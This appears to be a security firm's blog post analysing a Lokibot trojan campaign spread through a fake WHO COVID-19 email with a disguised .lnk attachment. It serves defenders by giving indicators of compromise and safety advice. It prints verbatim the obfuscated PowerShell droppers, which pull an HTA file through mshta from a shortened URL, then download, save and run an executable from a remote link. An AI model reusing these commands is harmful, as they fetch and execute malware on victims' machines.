• +353 14 370 142 |
  • Offices |
  • |
Cyber security threat analytics

Lokibot Distribution via fake WHO E-Mail

Introduction:

While COVID-19 emerged as a crisis globally, Malware authors started using corona themes as attack vectors like phishing, distributing trojans via fake emails and fake websites. This blog provides our analysis on the distribution of Lokibot malware via a fake email stating as a message regarding research from the World Health Organization (WHO).

Distribution:

The Email is sent with an attachment mentioned as pdf containing safety measures with a logo of WHO to look a bit more legit.

Fig 1. Fake Email
Fig 1. Fake Email

Analysis of Attachment:

The attachment is a compressed .zip file with the name COVID-19_UPDATE.zip. By Extracting it, a shortcut file is found with the name COVID-19_UPDATE.jpg.lnk. The .lnk files is a shortcut file which open programs or command associated with it directly by clicking on the icon.

Fig 2. .lnk File

As shown in the above Figure, the shortcut file looks like an image file, but it’s actually a .lnk file with embedded commands which when clicked will, in turn, execute it.

Fig 3. Malicious Command in .lnk file

The encoded command shown below gets executed 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $ib=[string][char[]]@(0x68,0x74,0x74,0x70,0x73) -replace ‘ ‘,”;$cd=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ‘ ‘,”;sal twf $cd;$ib+=’://cutt.ly/MtbRJGC’;twf $ib

After decoding the strings the command looks like,

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $ib=https;

$cd=mshta;

sal twf $cd;

$ib+=’://cutt.ly/MtbRJGC’;

twf $ib

Now it seems a bit clear that a file gets downloaded and executed via mshta. A link shortener service is used to download https://185.242.104[.]197/wzjd/out-1068156992.hta.

HTA is a file extension for an HTML executable file format. HTA files are used with Internet Explorer 5 and up and also it can be executed by the mshta.exe program.

Analysis of .HTA File:
The .hta file contains a highly encoded VBS code to bypass detection systems and make analysis harder. To filter out the main code we reverse it from the main function.

Fig 4. Main function in VBS code.

The above piece of code makes it clear that a command stored in the variable khezxtlctf gets executed via Wscript.shell.

After decoding and joining the strings stored variable, we get the command that gets executed which looks like,

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL mdosy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;mdosy pijkdcmv $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pijkdcmv;mdosy fdbhrvskngeojt $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = ‘aHR0cHM6Ly90aW55dXJsLmNvbS90bTV4YWNn’;$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);fdbhrvskngeojt $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}””

The above command is encoded which is not much readable but by looking at the strings like DownloadData and WriteAllBytes we can say that the command downloads and stores some file on the disk.

Fig 5. Futher decoding of powershell command

The executable file gets downloaded and executed from the remote url. The executed file is Lokibot Trojan which is designed to infiltrate systems and collect information and send it back to the attacker.

Process graph:

Fig 6. Process graph

How to Stay Safe:

  1. Do not open links or download attachments in emails from untrusted sources.
  2. Keep your Device and Software updated.
  3. Disable Macros while using MS Office.
  4. Update your antivirus to protect your system from unknown threats.

Xunison Protection:

Xunison has detections in place to protect against this attack or vulnerabilities exploited, so customers with updated Xbrain intrusion prevention signatures are protected against this attack. Users should also ensure that they update their Xbrain regularly to prevent attackers from exploiting known vulnerabilities.

Xunsion Signature:

INFECTED: LOKIBOT CNC CONNECTION DETECTED AND BLOCKED

IOCs:-

Hash: 6e8f274f39145a31167eb35ea8fedfae5b62ab8bee255a90adf6513789d3678a (COVID-19_UPDATE.ZIP)

Hash: f6ca3d486d4eed11ff3c79ec690826b290b6110ac4a838fbbb24337aac338ffc (out-1429065212.hta)

IP: 185.242.104.197

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp
Share on pinterest
Pinterest
Share on email
Email